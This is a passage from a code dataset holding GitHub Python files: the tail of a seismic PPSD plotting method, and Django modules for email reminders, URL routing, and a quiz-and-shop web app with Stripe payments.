showing color coded for each\n frequency/amplitude bin at what percentage in time the value is\n not exceeded by the data (similar to the `percentile` option but\n continuously and color coded over the whole area). `max_percentage`\n is ignored when this option is specified.\n :type cumulative_number_of_colors: int\n :param cumulative_number_of_colors: Number of discrete color shades to\n use, `None` for a continuous colormap.\n :type xaxis_frequency: bool\n :param xaxis_frequency: If set to `True`, the x axis will be frequency\n in Hertz as opposed to the default of period in seconds.\n \"\"\"\n self._PPSD__check_histogram()\n if fig is None:\n fig = plt.figure()\n fig.ppsd = obspy.core.util.AttribDict()\n\n if show_coverage:\n gs = matplotlib.gridspec.GridSpec(2, 1, height_ratios=[10, 1])\n ax = fig.add_subplot(gs[0])\n ax2 = fig.add_subplot(gs[1])\n #ax = fig.add_axes([0.12, 0.3, 0.90, 0.6])\n #ax2 = fig.add_axes([0.15, 0.17, 0.7, 0.04])\n else:\n ax = fig.add_subplot(111)\n\n ax.set_axisbelow(True)\n\n if show_percentiles:\n # for every period look up the approximate place of the percentiles\n for percentile in percentiles:\n periods, percentile_values = \\\n self.get_percentile(percentile=percentile)\n if xaxis_frequency:\n xdata = 1.0 / periods\n else:\n xdata = periods\n ax.plot(xdata, percentile_values, color=\"black\", zorder=8)\n\n if show_mode:\n periods, mode_ = self.get_mode()\n if xaxis_frequency:\n xdata = 1.0 / periods\n else:\n xdata = periods\n if cmap.name == \"viridis\":\n color = \"0.8\"\n else:\n color = \"black\"\n ax.plot(xdata, mode_, color=color, zorder=9)\n\n if show_mean:\n periods, mean_ = self.get_mean()\n if xaxis_frequency:\n xdata = 1.0 / periods\n else:\n xdata = periods\n if cmap.name == \"viridis\":\n color = \"0.8\"\n else:\n color = \"black\"\n ax.plot(xdata, mean_, color=color, zorder=9)\n\n if show_noise_models:\n for periods, noise_model in (obspy.signal.spectral_estimation.get_nhnm(), obspy.signal.spectral_estimation.get_nlnm()):\n if xaxis_frequency:\n xdata = 1.0 / periods\n else:\n xdata = periods\n ax.plot(xdata, noise_model, '0.4', linewidth=2, zorder=10)\n\n if show_histogram:\n label = \"[%]\"\n if cumulative:\n label = \"non-exceedance (cumulative) [%]\"\n if max_percentage is not None:\n msg = (\"Parameter 'max_percentage' is ignored when \"\n \"'cumulative=True'.\")\n warnings.warn(msg)\n max_percentage = 100\n if cumulative_number_of_colors is not None:\n cmap = matplotlib.colors.LinearSegmentedColormap(\n name=cmap.name, segmentdata=cmap._segmentdata,\n N=cumulative_number_of_colors)\n elif max_percentage is None:\n # Set default only if cumulative is not True.\n max_percentage = 30\n\n fig.ppsd.cumulative = cumulative\n fig.ppsd.cmap = cmap\n fig.ppsd.label = label\n fig.ppsd.max_percentage = max_percentage\n fig.ppsd.grid = grid\n fig.ppsd.xaxis_frequency = xaxis_frequency\n if max_percentage is not None:\n color_limits = (0, max_percentage)\n fig.ppsd.color_limits = color_limits\n\n self._plot_histogram(fig=fig)\n fig.ppsd.quadmesh.set_zorder(5)\n\n ax.semilogx()\n if xaxis_frequency:\n xlim = [1.0 / x for x in period_lim]\n ax.set_xlabel('Frequency [Hz]')\n ax.invert_xaxis()\n else:\n xlim = period_lim\n ax.set_xlabel('Period [s]')\n ax.set_xlim(sorted(xlim))\n ax.set_ylim(self.db_bin_edges[0], self.db_bin_edges[-1])\n if self.special_handling is None:\n ax.set_ylabel('Amplitude [$m^2/s^4/Hz$] [dB]', fontsize=8)\n else:\n ax.set_ylabel('Amplitude [dB]')\n ax.xaxis.set_major_formatter(matplotlib.ticker.FormatStrFormatter(\"%g\"))\n 
ax.set_title(self._get_plot_title())\n\n if show_coverage:\n self._PPSD__plot_coverage(ax2)\n # emulating fig.autofmt_xdate():\n for label in ax2.get_xticklabels():\n label.set_ha(\"right\")\n label.set_rotation(30)\n\n # Catch underflow warnings due to plotting on log-scale.\n _t = np.geterr()\n np.seterr(all=\"ignore\")\n\n plt.tight_layout()\n try:\n if filename is not None:\n plt.savefig(filename)\n plt.close()\n elif show:\n plt.draw()\n plt.show()\n else:\n plt.draw()\n return fig\n finally:\n np.seterr(**_t)\n", "repo_name": "stefanmaar/psysmon", "sub_path": "lib/psysmon/packages/frequency/compute_ppsd.py", "file_name": "compute_ppsd.py", "file_ext": "py", "file_size_in_byte": 22156, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "matplotlib.pyplot.style.use", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.style", "line_number": 15, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 15, "usage_type": "name"}, {"api_name": "psysmon.plot_style", "line_number": 15, "usage_type": "attribute"}, {"api_name": "psysmon.core", "line_number": 18, "usage_type": "attribute"}, {"api_name": "psysmon.core.packageNodes.LooperCollectionChildNode.__init__", "line_number": 27, "usage_type": "call"}, {"api_name": "psysmon.core", "line_number": 27, "usage_type": "attribute"}, {"api_name": "psysmon.core.preferences_manager.FloatSpinPrefItem", "line_number": 57, "usage_type": "call"}, {"api_name": "psysmon.core.preferences_manager", "line_number": 57, "usage_type": "name"}, {"api_name": "psysmon.core.preferences_manager.IntegerSpinPrefItem", "line_number": 66, "usage_type": "call"}, {"api_name": "psysmon.core.preferences_manager", "line_number": 66, "usage_type": "name"}, {"api_name": "psysmon.core.preferences_manager.FloatSpinPrefItem", "line_number": 80, "usage_type": "call"}, {"api_name": "psysmon.core.preferences_manager", "line_number": 80, "usage_type": "name"}, {"api_name": "psysmon.core.preferences_manager.FloatSpinPrefItem", "line_number": 89, "usage_type": "call"}, {"api_name": "psysmon.core.preferences_manager", "line_number": 89, "usage_type": "name"}, {"api_name": "psysmon.core.preferences_manager.IntegerSpinPrefItem", "line_number": 98, "usage_type": "call"}, {"api_name": "psysmon.core.preferences_manager", "line_number": 98, "usage_type": "name"}, {"api_name": "psysmon.gui.dialog.pref_listbook.ListbookPrefDialog", "line_number": 108, "usage_type": "call"}, {"api_name": "psysmon.gui.dialog.pref_listbook", "line_number": 108, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 116, "usage_type": "call"}, {"api_name": "os.path", "line_number": 116, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 117, "usage_type": "call"}, {"api_name": "os.path", "line_number": 117, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 118, "usage_type": "call"}, {"api_name": "obspy.core.signal", "line_number": 251, "usage_type": "attribute"}, {"api_name": "obspy.core", "line_number": 251, "usage_type": "name"}, {"api_name": "obspy.core.signal.PPSD", "line_number": 255, "usage_type": "call"}, {"api_name": "obspy.core.signal", "line_number": 255, "usage_type": "attribute"}, {"api_name": "obspy.core", "line_number": 255, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 269, "usage_type": "call"}, {"api_name": "os.path", "line_number": 269, "usage_type": "attribute"}, {"api_name": "os.path.exists", 
"line_number": 273, "usage_type": "call"}, {"api_name": "os.path", "line_number": 273, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 274, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 276, "usage_type": "call"}, {"api_name": "os.path", "line_number": 276, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 280, "usage_type": "call"}, {"api_name": "os.path", "line_number": 280, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 281, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 287, "usage_type": "call"}, {"api_name": "os.path", "line_number": 287, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 292, "usage_type": "call"}, {"api_name": "os.path", "line_number": 292, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.get_cmap", "line_number": 296, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 296, "usage_type": "name"}, {"api_name": "copy.copy", "line_number": 297, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 298, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 299, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 299, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 299, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 300, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 307, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 307, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 320, "usage_type": "call"}, {"api_name": "os.path", "line_number": 320, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 320, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 321, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 321, "usage_type": "call"}, {"api_name": "os.path", "line_number": 321, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 328, "usage_type": "call"}, {"api_name": "os.path", "line_number": 328, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 328, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 329, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 329, "usage_type": "call"}, {"api_name": "os.path", "line_number": 329, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.close", "line_number": 336, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 336, "usage_type": "name"}, {"api_name": "obspy.core.imaging", "line_number": 354, "usage_type": "attribute"}, {"api_name": "obspy.core", "line_number": 354, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 414, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 414, "usage_type": "name"}, {"api_name": "obspy.core.core.util.AttribDict", "line_number": 415, "usage_type": "call"}, {"api_name": "obspy.core.core", "line_number": 415, "usage_type": "attribute"}, {"api_name": "obspy.core", "line_number": 415, "usage_type": "name"}, {"api_name": "matplotlib.gridspec.GridSpec", "line_number": 418, "usage_type": "call"}, {"api_name": "matplotlib.gridspec", "line_number": 418, "usage_type": "attribute"}, {"api_name": "obspy.core.signal.spectral_estimation.get_nhnm", "line_number": 464, "usage_type": "call"}, {"api_name": "obspy.core.signal", "line_number": 464, "usage_type": "attribute"}, 
{"api_name": "obspy.core", "line_number": 464, "usage_type": "name"}, {"api_name": "obspy.core.signal.spectral_estimation.get_nlnm", "line_number": 464, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 478, "usage_type": "call"}, {"api_name": "matplotlib.colors.LinearSegmentedColormap", "line_number": 481, "usage_type": "call"}, {"api_name": "matplotlib.colors", "line_number": 481, "usage_type": "attribute"}, {"api_name": "matplotlib.ticker.FormatStrFormatter", "line_number": 515, "usage_type": "call"}, {"api_name": "matplotlib.ticker", "line_number": 515, "usage_type": "attribute"}, {"api_name": "numpy.geterr", "line_number": 526, "usage_type": "call"}, {"api_name": "numpy.seterr", "line_number": 527, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 529, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 529, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 532, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 532, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 533, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 533, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.draw", "line_number": 535, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 535, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 536, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 536, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.draw", "line_number": 538, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 538, "usage_type": "name"}, {"api_name": "numpy.seterr", "line_number": 541, "usage_type": "call"}]} +{"seq_id": "44396877940", "text": "from django.core.management.base import BaseCommand, CommandError\nfrom day_counter.models import Counter\nfrom users.models import User\nfrom datetime import timedelta, datetime\nfrom django.template import loader\nfrom grodvidar.settings import DOMAIN\nfrom django.core.mail import get_connection, EmailMultiAlternatives\nimport html2text\n\n\ndef send_mass_html_mail(datatuple, fail_silently=False, user=None, password=None,\n connection=None):\n \"\"\"\n Given a datatuple of (subject, text_content, html_content, from_email,\n recipient_list), sends each message to each recipient list. 
Returns the\n number of emails sent.\n\n If from_email is None, the DEFAULT_FROM_EMAIL setting is used.\n If auth_user and auth_password are set, they're used to log in.\n If auth_user is None, the EMAIL_HOST_USER setting is used.\n If auth_password is None, the EMAIL_HOST_PASSWORD setting is used.\n\n \"\"\"\n connection = connection or get_connection(\n username=user, password=password, fail_silently=fail_silently)\n messages = []\n for subject, text, html, from_email, recipient in datatuple:\n message = EmailMultiAlternatives(subject, text, from_email, recipient)\n message.attach_alternative(html, 'text/html')\n messages.append(message)\n return connection.send_messages(messages)\n\n\nclass Command(BaseCommand):\n help = 'Sends an email to all followers for every counter'\n\n def handle(self, *args, **kwargs):\n messages = ()\n for user in User.objects.filter(enable_reminders=True):\n date = (datetime.today() + timedelta(user.reminder_days)).date()\n followed_counters = Counter.objects.filter(followers=user, end_date=date)\n owned_counters = Counter.objects.filter(user=user, end_date=date)\n if followed_counters.exists() or owned_counters.exists():\n html_message = loader.render_to_string(\n 'counter/messages/counter_reminder.html',\n {\n 'user_name': user.first_name or user.username,\n 'days_left': user.reminder_days,\n 'owned_counters': owned_counters,\n 'followed_counters': followed_counters,\n 'domain': DOMAIN,\n }\n )\n text_message = html2text.html2text(html_message)\n messages += (('Counter reminders', text_message, html_message, None, [user.email]),)\n send_mass_html_mail(messages)\n\n\n", "repo_name": "GrodVidar/day_counter", "sub_path": "day_counter/management/commands/email_followers.py", "file_name": "email_followers.py", "file_ext": "py", "file_size_in_byte": 2546, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.core.mail.get_connection", "line_number": 24, "usage_type": "call"}, {"api_name": "django.core.mail.EmailMultiAlternatives", "line_number": 28, "usage_type": "call"}, {"api_name": "django.core.management.base.BaseCommand", "line_number": 34, "usage_type": "name"}, {"api_name": "users.models.User.objects.filter", "line_number": 39, "usage_type": "call"}, {"api_name": "users.models.User.objects", "line_number": 39, "usage_type": "attribute"}, {"api_name": "users.models.User", "line_number": 39, "usage_type": "name"}, {"api_name": "datetime.datetime.today", "line_number": 40, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 40, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 40, "usage_type": "call"}, {"api_name": "day_counter.models.Counter.objects.filter", "line_number": 41, "usage_type": "call"}, {"api_name": "day_counter.models.Counter.objects", "line_number": 41, "usage_type": "attribute"}, {"api_name": "day_counter.models.Counter", "line_number": 41, "usage_type": "name"}, {"api_name": "day_counter.models.Counter.objects.filter", "line_number": 42, "usage_type": "call"}, {"api_name": "day_counter.models.Counter.objects", "line_number": 42, "usage_type": "attribute"}, {"api_name": "day_counter.models.Counter", "line_number": 42, "usage_type": "name"}, {"api_name": "django.template.loader.render_to_string", "line_number": 44, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 44, "usage_type": "name"}, {"api_name": "grodvidar.settings.DOMAIN", "line_number": 51, "usage_type": "name"}, {"api_name": 
"html2text.html2text", "line_number": 54, "usage_type": "call"}]} +{"seq_id": "38795305265", "text": "from django.conf.urls import url\n\nfrom . import views\n\n\nurlpatterns = [\n #===============================>\n # 거래처관리\n #===============================<\n # 거래처 리스트(Json)\n url(r'^accountman/json/list/$', views.accountmanJsonList, name='accountman__json__list'),\n # 거래처 정보 수정(Json)\n url(r'^accountman/json/modify/$', views.accountmanJsonModify, name='accountman__json__modify'),\n # 거래처 정보 등록(Json)\n url(r'^accountman/json/regist/$', views.accountmanJsonRegist, name='accountman__json__regist'),\n # 거래처 상세 화면\n url(r'^accountman/detail/$', views.accountmanDetailCV, name='accountman__detail'),\n # 거래처 등록 화면\n url(r'^accountman/regist/$', views.accountmanRegistCV, name='accountman__regist'),\n\n #===============================>\n # 직원관리\n #===============================<\n # 직원 리스트(Json)\n url(r'^staffman/json/list/$', views.staffmanJsonList, name='staffman__json__list'),\n # 직원 정보 수정(Json)\n url(r'^staffman/json/modify/$', views.staffmanJsonModify, name='staffman__json__modify'),\n # 직원 정보 등록(Json)\n url(r'^staffman/json/regist/$', views.staffmanJsonRegist, name='staffman__json__regist'),\n # 직원 상세 화면\n url(r'^staffman/detail/$', views.staffmanDetailCV, name='staffman__detail'),\n # 직원 등록 화면\n url(r'^staffman/regist/$', views.staffmanRegistCV, name='staffman__regist'),\n\n #===============================>\n # 매장관리\n #===============================<\n # 매장 리스트(Json)\n url(r'^shopman/json/list/$', views.shopmanJsonList, name='shopman__json__list'),\n # 매장 정보 수정(Json)\n url(r'^shopman/json/modify/$', views.shopmanJsonModify, name='shopman__json__modify'),\n # 매장 정보 등록(Json)\n url(r'^shopman/json/regist/$', views.shopmanJsonRegist, name='shopman__json__regist'),\n # 매장 상세 화면\n url(r'^shopman/detail/$', views.shopmanDetailCV, name='shopman__detail'),\n # 매장 등록 화면\n url(r'^shopman/regist/$', views.shopmanRegistCV, name='shopman__regist'),\n\n #===============================>\n # 기본설정\n #===============================<\n # 기본설정 정보 수정(Json)\n url(r'^basicman/json/modify/$', views.basicmanJsonModify, name='basicman__json__modify'),\n]\n", "repo_name": "007babe/ntelRepo", "sub_path": "ntelProject/src/setting/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 2384, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 13, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 15, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 17, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 19, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 25, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 27, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 29, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 31, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 33, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 39, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 41, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 43, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 45, "usage_type": "call"}, 
{"api_name": "django.conf.urls.url", "line_number": 47, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 53, "usage_type": "call"}]} +{"seq_id": "24091622760", "text": "from django.shortcuts import render,redirect\nfrom django.contrib import messages\nfrom .models import *\nimport bcrypt\nimport random\n\nfrom datetime import date\nfrom pet_ninja import settings\nimport datetime\nimport stripe\n\nfrom django.http import JsonResponse\n\nstripe.api_key = settings.STRIPE_SECRET_KEY\n\ndef index(request):\n return render(request,'one/home.html')\ndef register(request):\n return render(request,'one/register.html')\ndef registering(request):\n if request.method=='POST':\n result = User.objects.validations(request.POST)\n if 'errors' in result:\n for key,value in result['errors'].items():\n messages.error(request,value) \n return redirect('/register') \n else:\n messages.success(request,'You have successfully registered')\n return redirect('/')\n return redirect('/')\ndef logging_in(request):\n if request.method=='POST':\n users_with_same_email = User.objects.filter(email=request.POST['email'])\n if len(users_with_same_email) > 0:\n user_1=users_with_same_email.first()\n if bcrypt.checkpw(request.POST['password'].encode(),user_1.password.encode()):\n request.session['id'] = user_1.id\n request.session['display_name'] = user_1.display_name\n return redirect('/user')\n else:\n messages.error(request,'Wrong password')\n return redirect('/invalid')\n else:\n messages.error(request,'Email does not exist')\n return redirect('/invalid')\ndef invalid(request):\n return render(request,'one/invalid.html')\n\n# =====================================\n# USER HOMEPAGE\n# =====================================\ndef user_page(request):\n if \"id\" not in request.session:\n return redirect('/')\n user = User.objects.get(id=request.session['id'])\n weapons_user_has = user.weapons.all()\n auras_user_has = user.auras.all()\n backgrounds_user_has = user.backgrounds.all()\n if user.favorite_weapon != \"\":\n favorite_weapon = Weapon.objects.get(name=user.favorite_weapon)\n else:\n favorite_weapon = \"\";\n if user.favorite_aura != \"\":\n favorite_aura = Aura.objects.get(name=user.favorite_aura)\n else:\n favorite_aura = \"\";\n if user.favorite_background != \"\":\n favorite_background = Background.objects.get(name=user.favorite_background)\n else:\n favorite_background = \"\";\n\n context = {\n 'weapons_owned': weapons_user_has,\n 'auras_owned':auras_user_has,\n 'backgrounds_owned':backgrounds_user_has,\n 'favorite_weapon': favorite_weapon,\n 'favorite_aura': favorite_aura,\n 'favorite_background':favorite_background\n }\n return render(request,'one/user.html',context)\n\ndef user_info(request):\n if \"id\" not in request.session:\n return redirect('/')\n user =User.objects.get(id=request.session['id'])\n today = date.today()\n age= today.year - user.dob.year - ((today.month,today.day) < (user.dob.month, user.dob.day))\n context = {\n 'user':user,\n 'age':age\n }\n return render(request,'one/user_info.html',context)\ndef view_user(request,userid):\n if \"id\" not in request.session:\n return redirect('/')\n user = User.objects.get(id=userid)\n if user.favorite_weapon != \"\":\n favorite_weapon = Weapon.objects.get(name=user.favorite_weapon)\n else:\n favorite_weapon = \"\";\n if user.favorite_aura != \"\":\n favorite_aura = Aura.objects.get(name=user.favorite_aura)\n else:\n favorite_aura = \"\";\n if user.favorite_background != \"\":\n favorite_background = 
Background.objects.get(name=user.favorite_background)\n else:\n favorite_background = \"\";\n today = date.today()\n age= today.year - user.dob.year - ((today.month,today.day) < (user.dob.month, user.dob.day))\n context = {\n 'user':user,\n 'age':age,\n 'favorite_background':favorite_background,\n 'favorite_aura':favorite_aura,\n 'favorite_weapon':favorite_weapon\n }\n return render(request,'one/view_user.html',context)\n \ndef user_info_edit(request):\n user= User.objects.get(id=request.session['id'])\n user.first_name = request.POST['first_name']\n user.last_name = request.POST['last_name']\n user.display_name = request.POST['display_name']\n user.email = request.POST['email']\n user.programming_language= request.POST['programming_language']\n user.location = request.POST['location']\n user.save()\n return redirect('/user/info')\n \ndef user_edit(request):\n if \"id\" not in request.session:\n return redirect('/')\n user =User.objects.get(id=request.session['id'])\n context = {\n 'user':user\n } \n return render(request,'one/user_edit.html',context)\n\ndef ranking_page(request):\n if \"id\" not in request.session:\n return redirect('/')\n everyone = User.objects.order_by(\"-point\")\n context = {\n 'peoples': everyone\n }\n return render(request,'one/ranking.html',context)\n\ndef favorite_item(request,category):\n user = User.objects.get(id=request.session['id'])\n if(category == \"weapon\"):\n item = Weapon.objects.get(image=request.POST['name'])\n user.favorite_weapon = item.name\n elif(category == \"aura\"):\n item= Aura.objects.get(image=request.POST['name'])\n user.favorite_aura = item.name\n elif(category == \"background\"):\n item= Background.objects.get(image=request.POST['name'])\n user.favorite_background = item.name\n \n user.save()\n return redirect('/user')\n# =====================================\n# CLASSROOM\n# =====================================\ndef classroom(request):\n if \"id\" not in request.session:\n return redirect('/')\n return render(request,'one/classroom.html')\ndef classroom_questions(request,language,difficulty,number):\n if \"id\" not in request.session:\n return redirect('/')\n q = Question.objects.filter(category=language,difficulty= difficulty)\n q = q.get(number=number)\n a = Answer.objects.filter(question=number)\n context = {\n 'questions': q,\n 'answers':a\n }\n return render(request,'one/classroom_questions.html',context)\n\ndef check_answers(request): \n if \"count\" not in request.session:\n request.session['count'] = 0;\n if request.POST['answer'] == \"True\":\n request.session['count'] += 1;\n if \"answered\" not in request.session:\n request.session['answered']= 0;\n request.session['answered']+=1;\n if request.session['answered'] > 9:\n return redirect('/classroom/end_of_quiz')\n \n print(request.session['answered'])\n return redirect ('/classroom/{}/{}/{}'.format(request.POST['category'],request.POST['difficulty'],int(request.POST['number']) + 1))\ndef end_of_quiz(request):\n if \"id\" not in request.session:\n return redirect('/')\n u = User.objects.get(id=request.session['id'])\n u.point+=request.session['count']\n u.gold+= request.session['count']\n u.save()\n return render(request,'one/endofquiz.html')\ndef ending(request):\n request.session['count'] = 0;\n request.session['answered'] = 0;\n return redirect('/user')\n\n\n# ===================================\n# MALL\n# ==================================\ndef mall(request):\n if \"id\" not in request.session:\n return redirect('/')\n golds = Gold.objects.all()\n context = {\n 
'stripe_key': settings,\n 'golds': golds\n }\n return render(request,'one/mall.html',context)\ndef mall_weapon(request,category):\n if "id" not in request.session:\n return redirect('/')\n if(category == "weapon"):\n allItems = Weapon.objects.all();\n elif(category == "aura"):\n allItems = Aura.objects.all();\n elif(category == "background"):\n allItems = Background.objects.all();\n category = category\n context={\n 'weapons': allItems,\n 'category': category\n }\n print(context)\n return render(request,'one/mall_weapon.html',context)\ndef buy_item(request,category,id):\n user = User.objects.get(id=request.session['id'])\n if(category == "weapon"):\n item_being_bought = Weapon.objects.get(id=id)\n elif(category == "aura"):\n item_being_bought = Aura.objects.get(id=id)\n elif(category == "background"):\n item_being_bought = Background.objects.get(id=id)\n\n if user.gold >= item_being_bought.price:\n item_being_bought.owner.add(request.session['id'])\n item_being_bought.save()\n user.gold -= item_being_bought.price\n user.save()\n else:\n messages.error(request, 'Not enough gold!')\n return redirect('/user')\ndef charge(request):\n if request.method == "POST":\n token = request.POST.get("stripeToken")\n\n try:\n charge = stripe.Charge.create(\n amount = int(request.POST['price'],0),\n currency = "usd",\n source = token,\n description = "The product charged to the user"\n )\n except stripe.error.CardError as ce:\n return False, ce\n\n else:\n user = User.objects.get(id=request.session['id'])\n user.gold += int(request.POST['amount'])\n user.save()\n return redirect('/user')\n\n# ====================================\n# MISC \n# =====================================\ndef logout(request):\n request.session.clear();\n return redirect('/')\ndef adding(request):\n return render(request,'one/adding.html')\n\ndef addinga(request):\n Answer.objects.create(\n content = request.POST['content'],\n correct= request.POST['correct'],\n question_id=request.POST['question_id']\n )\n return redirect('/adding')\ndef addingq(request):\n Question.objects.create(\n content=request.POST['content'],\n difficulty=request.POST['difficulty']\n )\n return redirect('/adding')\n\n", "repo_name": "Mykohnguyen/codingme", "sub_path": "apps/one/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 9955, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "stripe.api_key", "line_number": 14, "usage_type": "attribute"}, {"api_name": "pet_ninja.settings.STRIPE_SECRET_KEY", "line_number": 14, "usage_type": "attribute"}, {"api_name": "pet_ninja.settings", "line_number": 14, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 17, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 19, "usage_type": "call"}, {"api_name": "django.contrib.messages.error", "line_number": 25, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 25, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 26, "usage_type": "call"}, {"api_name": "django.contrib.messages.success", "line_number": 28, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 28, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 29, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 30, "usage_type": "call"}, {"api_name": "bcrypt.checkpw", "line_number": 36, "usage_type": "call"}, {"api_name": 
"django.shortcuts.redirect", "line_number": 39, "usage_type": "call"}, {"api_name": "django.contrib.messages.error", "line_number": 41, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 41, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 42, "usage_type": "call"}, {"api_name": "django.contrib.messages.error", "line_number": 44, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 44, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 45, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 47, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 54, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 80, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 84, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 86, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 86, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 92, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 95, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 109, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 109, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 118, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 129, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 133, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 138, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 142, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 147, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 162, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 168, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 169, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 172, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 180, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 191, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 194, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 197, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 202, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 206, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 214, "usage_type": "call"}, {"api_name": "pet_ninja.settings", "line_number": 217, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 